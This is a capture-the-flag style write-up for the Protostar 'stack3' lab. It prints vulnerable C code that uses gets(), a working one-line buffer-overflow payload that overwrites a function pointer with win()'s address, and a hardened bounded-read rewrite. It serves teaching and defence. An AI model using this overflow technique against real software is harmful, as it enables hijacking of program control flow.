Stack 3

https://exploit-exercises.com/protostar/stack3/

Goal

To call the win function. The site notes that "gdb and objdump is your friend".

Source Code

stack3.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();   /* function pointer, initialised to NULL below */
  char buffer[64];        /* 64-byte stack buffer, sits next to fp on the stack */

  fp = 0;

  gets(buffer);           /* no length limit: input longer than 64 bytes overflows into fp */

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();               /* whatever value overwrote fp is called here */
  }
}

Exploit

It's pretty clear that we need to overwrite the value of fp with the address of the win function, so that the program calls win. First, let's figure out where win lives. A quick look at objdump shows that the -D flag disassembles everything ("disassemble all"). Let's try it.

Running objdump -D ./stack3 produces a ton of output, so let's pipe it through grep to keep only the lines mentioning win. Running objdump -D ./stack3 | grep win reveals:

08048424 <win>:

Okay, the first field of that line is the address of win. Now we just need to overwrite fp with that value. Using Python, let's print 64 'a's (to fill buffer) followed by "\x08\x04\x84\x24"[::-1]. (Note: the [::-1] reverses the order of those bytes, because x86 stores addresses little-endian, least significant byte first.) Thus, we see the following:

$ python -c 'print "a"*64 + "\x08\x04\x84\x24"[::-1]' | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
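The root cause above is the unbounded gets(), which has no way of knowing that buffer holds only 64 bytes (gets() was dropped from the C standard in C11 for exactly this reason). The following is an added example, not part of the write-up or of the Protostar sources: it keeps the same control flow as stack3's main() but replaces the read with a bounded copy, models the frame as an explicit struct so that the relationship between buffer and fp is visible, and reports truncation instead of silently letting input spill into fp. The struct layout and the names bounded_read and run_hardened are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUFLEN 64

/* Explicit model of the stack3 frame: a 64-byte buffer directly
 * followed by the function pointer. With an unbounded read, byte 65
 * onward lands in fp; with a bounded read it never can. (Assumed
 * layout for the demonstration; the real compiler-chosen layout may differ.) */
struct frame {
    char buffer[BUFLEN];
    void (*fp)(void);
};

/* Bounded replacement for gets(): copies at most cap-1 bytes of src
 * into dst and always NUL-terminates, the way fgets(dst, cap, stdin)
 * would. Returns how many input bytes did not fit (0 = whole line taken). */
size_t bounded_read(char *dst, size_t cap, const char *src)
{
    size_t len = strlen(src);
    size_t n = len < cap - 1 ? len : cap - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return len - n;
}

/* Same logic as stack3's main(), but hardened. Returns 1 if fp would
 * have been called, 0 otherwise; sets *dropped to the truncated byte count. */
int run_hardened(const char *line, size_t *dropped)
{
    struct frame f;
    f.fp = NULL;
    memset(f.buffer, 0, sizeof f.buffer);

    *dropped = bounded_read(f.buffer, sizeof f.buffer, line);
    if (*dropped)
        fprintf(stderr, "input truncated: %zu byte(s) dropped\n", *dropped);

    if (f.fp) {          /* unreachable with a bounded read: fp is never touched */
        f.fp();
        return 1;
    }
    return 0;
}

int main(void)
{
    char line[256];
    size_t dropped;
    /* Read one line from stdin with an explicit bound, strip the newline. */
    if (!fgets(line, sizeof line, stdin))
        return 1;
    line[strcspn(line, "\n")] = '\0';
    printf("fp reached: %d\n", run_hardened(line, &dropped));
    return 0;
}
```

Piping the write-up's 68-byte payload into this version yields "input truncated: 5 byte(s) dropped" and "fp reached: 0": the 63 bytes that fit stay inside buffer and the function pointer keeps its initial NULL. When reviewing similar code, the signal to look for is any gets(), strcpy() or scanf("%s") into a fixed-size array with no length argument; compilers already warn on gets() as deprecated, and those warnings deserve to be treated as errors.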